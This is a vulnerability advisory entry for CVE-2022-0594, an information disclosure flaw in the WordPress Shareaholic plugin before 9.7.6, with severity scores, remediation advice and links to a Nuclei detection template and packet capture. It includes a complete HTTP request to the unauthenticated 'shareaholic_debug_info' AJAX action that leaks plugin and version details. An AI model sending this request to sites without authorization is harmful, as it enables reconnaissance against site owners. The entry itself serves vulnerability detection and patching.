| Title | WordPress Shareaholic <9.7.6 - Information Disclosure |
|---|---|
| Author | atomiczsec |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to gain sensitive information from the target system. |
| Remediation | Update the Shareaholic plugin to version 9.7.6 or later to fix the information disclosure vulnerability. |
| CVSS Score | 5.3 |
| EPSS Score | 0.43978 |
| CVE ID | CVE-2022-0594 |
| CWE ID | CWE-863 |
| Tags | cve cve2022 wordpress wp wp-plugin exposure wpscan shareaholic vuln |
WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.).
GET /wp-admin/admin-ajax.php?action=shareaholic_debug_info HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0594.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-0594.pcap
N/AN/A